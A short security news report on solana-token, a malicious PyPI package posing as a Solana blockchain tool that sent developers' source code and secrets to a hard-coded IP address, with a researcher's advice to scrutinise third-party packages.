Cybersecurity researchers have discovered a malicious package on the Python Package Index (PyPI) repository that purports to be an application related to the Solana blockchain, but contains malicious functionality to steal source code and developer secrets.
The package, named solana-token, is no longer available for download from PyPI, but not before it was downloaded 761 times. It was first published to PyPI in early April 2024, albeit with an entirely different version numbering scheme.
“When installed, the malicious package attempts to exfiltrate source code and developer secrets from the developer’s machine to a hard-coded IP address,” ReversingLabs researcher Karlo Zanki said in a report shared with The Hacker News.
In particular, the package is designed to copy and exfiltrate the source code contained in all the files in the Python execution stack under the guise of a blockchain function named “register_node().”
This unusual behavior suggests that the attackers are looking to exfiltrate sensitive crypto-related secrets that may be hard-coded in the early stages of writing a program incorporating the malicious function in question.
It’s believed that developers looking to create their own blockchains were the likely targets of the threat actors behind the package. This assessment is based on the package name and the functions built into it.
The exact method by which the package may have been distributed to users is currently not known, although it’s likely to have been promoted on developer-focused platforms.
If anything, the discovery underscores the fact that cryptocurrency continues to be one of the most popular targets for supply chain threat actors, necessitating that developers take steps to scrutinize every package before using it.
“Development teams need to aggressively monitor for suspicious activity or unexplained changes within both open source and commercial, third-party software modules,” Zanki said. “By stopping malicious code before it is allowed to penetrate secure development environments, teams can prevent the kind of destructive supply chain attacks.”
